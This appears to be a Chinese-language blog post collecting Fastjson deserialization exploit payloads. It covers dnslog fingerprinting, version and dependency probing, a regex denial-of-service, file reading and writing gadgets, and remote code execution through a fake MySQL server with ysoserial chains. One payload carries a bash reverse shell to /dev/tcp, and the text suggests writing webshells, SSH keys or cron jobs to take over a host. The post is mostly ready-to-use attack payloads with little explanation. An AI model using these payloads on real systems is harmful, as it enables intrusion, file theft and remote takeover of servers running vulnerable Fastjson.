本文最后更新于 2025年7月23日 晚上
指纹探测
报错
传入不合法的json数据会报错,如{或者[
不存在的类
dnslog
可以在传入json数据的地方通过dnslog来探测是否能触发fastjson反序列化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| {"aa":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"aa":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"lo32ps.dnslog.cn"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://11.kaitr5.dnslog.cn"}}""}
Set[{"@type":"java.net.URL","val":"http://w7ln1u.dnslog.cn"}]
Set[{"@type":"java.net.URL","val":"http://l4t0t0.dnslog.cn"}
{{"@type":"java.net.URL","val":"http://dnslog.com"}:"a"}
{"aa":{"@type":"java.net.InetAddress","val":"vbiyxs.dnslog.cn"}}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| [
{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.net.InetSocketAddress"
{
"address":,
"val": "11.a0y6ja.dnslog.cn"
}
}
]
|
1
2
3
4
5
6
7
8
9
10
| {
"@type": "java.lang.Exception",
"@type": "com.alibaba.fastjson.JSONException",
"x": {
"@type": "java.net.InetSocketAddress"{
"address": ,
"val": "2.tuai7j.dnslog.cn"
}
}
}
|
版本探测
dnslog
1
2
3
|
{{"@type":"java.net.URL","val":"http://dnslog.com"}:"a"}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
{"aa":{"@type":"java.net.InetAddress","val":"vbiyxs.dnslog.cn"}}
[
{
"@type": "java.lang.Class",
"val": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.io.ByteArrayOutputStream"
},
{
"@type": "java.net.InetSocketAddress"
{
"address":,
"val": "dnslog"
}
}
]
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
[
{
"@type": "java.lang.Exception",
"@type": "com.alibaba.fastjson.JSONException",
"x": {
"@type": "java.net.InetSocketAddress"
{
"address":,
"val": "ccc.4fhgzj.dnslog.cn"
}
}
},
{
"@type": "java.lang.Exception",
"@type": "com.alibaba.fastjson.JSONException",
"message": {
"@type": "java.net.InetSocketAddress"
{
"address":,
"val": "ddd.4fhgzj.dnslog.cn"
}
}
}
]
|
报错
1
2
3
4
5
6
| {"@type":"java.lang.AutoCloseable"
{"z":{"@type":"java.lang.AutoCloseable"
a
["test":1]
[
|
这种方法版本回显不一定准确,如测试发现1.2.77-1.2.80版本回显都为1.2.76
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| 【不报错】1.2.83/1.2.24
【报错】1.2.25-1.2.80
{"zero":{"@type":"java.lang.Exception","@type":"org.XxException"}}
不报错】1.2.24-1.2.68
【报错】1.2.70-1.2.83
{"zero":{"@type":"java.lang.AutoCloseable","@type":"java.io.ByteArrayOutputStream"}}
【不报错】1.2.24-1.2.47
【报错】1.2.48-1.2.83
{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl"
}
}
|
1.2.36-1.2.62正则DDOS
1
2
3
4
5
6
7
|
{
"regex":{
"$ref":"$[blue rlike '^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$']"
},
"blue":"aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
}
|
探测开启autotype
1
| [{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}]
|
开启时
未开启
依赖探测
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| org.springframework.web.bind.annotation.RequestMapping
org.apache.catalina.startup.Tomcat
groovy.lang.GroovyShell
com.mchange.v2.c3p0.DataSources
com.mysql.jdbc.Buffer
com.mysql.cj.api.authentication.AuthenticationProvider
com.mysql.cj.protocol.AuthenticationProvider
sun.nio.cs.GBK
java.net.http.HttpClient
org.apache.ibatis.type.Alias
org.apache.tomcat.dbcp.dbcp.BasicDataSource
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
org.apache.commons.io.Charsets
org.apache.commons.io.file.Counters
org.aspectj.ajde.Ajde
|
通过使用 Character 将报错回显在 message 中 Fastjson ≤ 1.2.47
1
2
3
4
5
6
7
| {
"x": {
"@type": "java.lang.Character"{
"@type": "java.lang.Class",
"val": "org.springframework.web.bind.annotation.RequestMapping"
}
}
|
文件读取
FastJson>=1.2.73 && <=1.2.80
1
2
3
4
5
| <dependency>
<groupId>org.aspectj</groupId>
<artifactId>aspectjtools</artifactId>
<version>1.9.5</version>
</dependency>
|
此利用方式同上,仅在web端可行,因为需要用到缓存机制,依次发送三段payload。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
{
"@type":"java.lang.Exception",
"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException"
}
poc1-2
{
"@type":"java.lang.Class",
"val":{
"@type":"java.lang.String"{
"@type":"java.util.Locale",
"val":{
"@type":"com.alibaba.fastjson.JSONObject",
{
"@type":"java.lang.String"
"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.lookup.SourceTypeCollisionException",
"newAnnotationProcessorUnits":[{}]
}
}
}
poc1-3
{
"@type":"java.lang.Character"
{
"c":{
"@type":"org.aspectj.org.eclipse.jdt.internal.compiler.env.ICompilationUnit",
"@type":"org.aspectj.org.eclipse.jdt.internal.core.BasicCompilationUnit",
"fileName":"c:/windows/win.ini"
}
}
|
mysql jdbc
1
2
3
4
5
| <dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>8.0.19</version>
</dependency>
|
payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
"proxy": {
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
"connectionUrl": {
"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
"masters": [
{
"host": "127.0.0.1"
}
],
"slaves": [],
"properties": {
"host": "192.168.100.128",
"user": "ssrf",
"dbname": "dbname",
"password": "pass",
"queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"allowLoadLocalInfile": "true"
}
}
}
}
|
需要MySQL_Fake_Serverpython3.8
username选择不同的payload
commons-io fastjson<=1.2.80
pom
1
2
3
4
5
6
| <dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>2.11.0</version>
</dependency>
|
payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| {
"abc": {
"@type": "java.lang.AutoCloseable",
"@type": "org.apache.commons.io.input.BOMInputStream",
"delegate": {
"@type": "org.apache.commons.io.input.ReaderInputStream",
"reader": {
"@type": "jdk.nashorn.api.scripting.URLReader",
"url": "file:///D:/test/1.txt"
},
"charsetName": "UTF-8",
"bufferSize": 1024
},
"boms": [{
"charsetName": "UTF-8",
"bytes": [49]
}]
},
"address": {
"$ref": "$.abc.BOM"
}
}
|
有输出表示第一个字符的ascii是49,如果不是则无输出
boms可以用多个,可以逐个爆破
写文件
知道web路径可以写马,或者有权限的话写ssh公钥,或者写计划任务getshell
1.2.37 <= FastJson <=1.2.83
pom,依赖有点多
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| <dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.68</version>
</dependency>
<dependency>
<groupId>org.aspectj</groupId>
<artifactId>aspectjtools</artifactId>
<version>1.9.5</version>
</dependency>
<dependency>
<groupId>com.esotericsoftware</groupId>
<artifactId>kryo</artifactId>
<version>4.0.0</version>
</dependency>
<dependency>
<groupId>com.sleepycat</groupId>
<artifactId>je</artifactId>
<version>5.0.73</version>
</dependency>
|
poc
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| {
"stream": {
"@type": "java.lang.AutoCloseable",
"@type": "org.eclipse.core.internal.localstore.SafeFileOutputStream",
"targetPath": "d:/test/pwn.txt",
"tempPath": "d:/test/test.txt"
},
"writer": {
"@type": "java.lang.AutoCloseable",
"@type": "com.esotericsoftware.kryo.io.Output",
"buffer": "YjF1M3I=",
"outputStream": {
"$ref": "$.stream"
},
"position": 5
},
"close": {
"@type": "java.lang.AutoCloseable",
"@type": "com.sleepycat.bind.serial.SerialOutput",
"out": {
"$ref": "$.writer"
}
}
}
|
JDBC rce
MYSQL JDBC
需要探测依赖
1
2
3
| com.mysql.jdbc.Buffer
com.mysql.cj.api.authentication.AuthenticationProvider
com.mysql.cj.protocol.AuthenticationProvider
|
需要Fake MySQL Server联动ysoserial
命令格式yso_xx_xxx
如java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS [http://xx.xxxxx.ceye.io](http://xx.xxxxx.ceye.io)
就是yso_URLDNS_[http://11.82m3mf.dnslog.cn](http://11.82m3mf.dnslog.cn)
mysql8.0.19
1
2
3
4
5
| <dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>8.0.19</version>
</dependency>
|
payload可以先dnslog看能否利用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
"proxy": {
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
"connectionUrl": {
"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
"masters": [
{
"host": "192.168.100.128"
}
],
"slaves": [],
"properties": {
"host": "192.168.100.128",
"user": "yso_URLDNS_http://11.82m3mf.dnslog.cn",
"dbname": "dbname",
"password": "pass",
"queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"allowLoadLocalInfile": "true"
}
}
}
}
|
这里ReplicationMySQLConnection换成MultiHostMySQLConnection或者LoadBalancedMySQLConnection都不影响
反弹shell
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
"proxy": {
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
"connectionUrl": {
"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
"masters": [
{
"host": "192.168.100.128"
}
],
"slaves": [],
"properties": {
"host": "192.168.100.128",
"user": "yso_FastJson1_bash -i >& /dev/tcp/ip/port 0>&1",
"dbname": "dbname",
"password": "pass",
"queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"allowLoadLocalInfile": "true"
}
}
}
}
|
有CommonsCollections4版本是4.0
1
2
3
4
5
6
7
8
9
10
11
| <dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>8.0.19</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
|
cc4 payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
"proxy": {
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
"connectionUrl": {
"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
"masters": [
{
"host": "192.168.100.128"
}
],
"slaves": [],
"properties": {
"host": "192.168.100.128",
"user": "yso_CommonsCollections4_calc",
"dbname": "dbname",
"password": "pass",
"queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"allowLoadLocalInfile": "true"
}
}
}
}
|
cc2 payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
"proxy": {
"@type": "com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
"connectionUrl": {
"@type": "com.mysql.cj.conf.url.ReplicationConnectionUrl",
"masters": [
{
"host": "192.168.100.128"
}
],
"slaves": [],
"properties": {
"host": "192.168.100.128",
"user": "yso_CommonsCollections2_calc",
"dbname": "dbname",
"password": "pass",
"queryInterceptors": "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"allowLoadLocalInfile": "true"
}
}
}
}
|
mysql5
5.1.x(SSRF),5.1.11-5.1.48(反序列化链)
1
2
3
4
5
6
7
8
9
10
| <dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>5.1.12</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
|
cc4
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "192.168.100.128",
"portToConnectTo": 3306,
"info": {
"user": "yso_CommonsCollections4_calc",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
},
"databaseToConnectTo": "dbname",
"url": ""
}
|
cc2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| {
"@type": "java.lang.AutoCloseable",
"@type": "com.mysql.jdbc.JDBC4Connection",
"hostToConnectTo": "192.168.100.128",
"portToConnectTo": 3306,
"info": {
"user": "yso_CommonsCollections2_calc",
"password": "pass",
"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
"autoDeserialize": "true",
"NUM_HOSTS": "1"
},
"databaseToConnectTo": "dbname",
"url": ""
}
|
mysql6
6.0.2/6.0.3(反序列化)
1
2
3
4
5
6
7
8
9
10
| <dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<version>6.0.2</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.0</version>
</dependency>
|
cc4
1
2
3
4
5
6
7
8
9
| {
"@type":"java.lang.AutoCloseable",
"@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
"proxy": {
"connectionString":{
"url":"jdbc:mysql://192.168.100.128:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections4_calc"
}
}
}
|
cc2
1
2
3
4
5
6
7
8
9
| {
"@type":"java.lang.AutoCloseable",
"@type":"com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
"proxy": {
"connectionString":{
"url":"jdbc:mysql://192.168.100.128:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_CommonsCollections2_calc"
}
}
}
|